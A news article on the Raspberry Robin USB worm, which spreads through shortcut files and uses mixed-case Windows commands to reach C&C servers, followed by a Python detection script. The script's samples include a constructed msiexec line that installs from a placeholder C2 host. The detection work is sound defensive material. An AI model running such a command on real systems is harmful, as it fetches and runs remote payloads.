This computer worm spreads the old-fashioned way, thanks to a USB key


USB drives continue to be a vector of infection in organizations. Red Canary security researchers have discovered a worm that spreads through USB drives.
Named Raspberry Robin, the malware is hidden in a shortcut file (LNK) on the key. As soon as the key connects, the Windows registry is updated. The malware then runs a series of Windows applications such as cmd, msiexec, odbcconf and fodhelper. The commands used mix lowercase and uppercase characters, which makes them more difficult for antivirus engines to detect.

Some commands will attempt to establish an outside connection to Command and Control (C&C) servers. Generally, these are Qnap network storage servers.

“We believe that Raspberry Robin is using compromised Qnap devices for its C&C infrastructure,” say the researchers.

These outside connections allow the malware to download other malicious code. In particular, the researchers observed the installation of a corrupted DLL, which would be used to guarantee persistence on the machine.
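The case-mixing evasion and the outbound connections described above can be checked for on the defender's side. The following is an added example, not code from Red Canary or the original article: it normalizes case before matching the binaries the article names, and treats irregular casing itself as a signal. The sample command lines, the `example.invalid` hosts and the scoring weights are constructed assumptions.

```python
import re

# Windows binaries the article names as being launched by the worm.
WATCHED = {"cmd", "msiexec", "odbcconf", "fodhelper"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Casing a person or installer normally produces: lower, UPPER, or CamelCase.
NORMAL_CASE = re.compile(r"(?:[a-z]+|[A-Z]+|(?:[A-Z][a-z]{2,})+)")

# Constructed command lines for illustration (not captured from a real host).
SAMPLES = [
    'mSIexEC /q /I "hTTp://c2.example.invalid:8080/a"',
    r"C:\Windows\System32\msiexec.exe /i C:\Temp\setup.msi /qn",
    "curl.exe https://example.invalid/x",
]


def image_name(token):
    """Lowercased executable name without directory or .exe suffix."""
    name = token.strip('"').rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def irregular_case(token):
    """True if any word of 3+ letters has casing outside NORMAL_CASE."""
    words = re.findall(r"[A-Za-z]{3,}", token)
    return any(not NORMAL_CASE.fullmatch(w) for w in words)


def analyze(cmdline):
    """Score one process command line (whitespace-split; a simplification)."""
    tokens = cmdline.split()
    exe = image_name(tokens[0]) if tokens else ""
    watched = exe in WATCHED
    urls = URL_RE.findall(cmdline) if watched else []
    # URLs are skipped in the case check: paths in them are often mixed case.
    mixed = watched and any(
        irregular_case(t) for t in tokens if not URL_RE.search(t)
    )
    score = (2 if urls else 0) + (1 if mixed else 0)
    return {"exe": exe, "mixed_case": mixed, "urls": urls, "score": score}


if __name__ == "__main__":
    for line in SAMPLES:
        print(analyze(line)["score"], line)
```

A case-sensitive search for `msiexec` misses the first sample entirely, while the normalized check scores it highest and leaves the ordinary local install at zero.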


The victims seem to be above all technology and industrial companies. But there are still many gray areas. Since the researchers were unable to get their hands on the malicious code that was later installed, the end goal of this malware is not known. The researchers do not risk attribution either. But this discovery shows, once again, the risks associated with unidentified USB keys.

Source: Red Canary
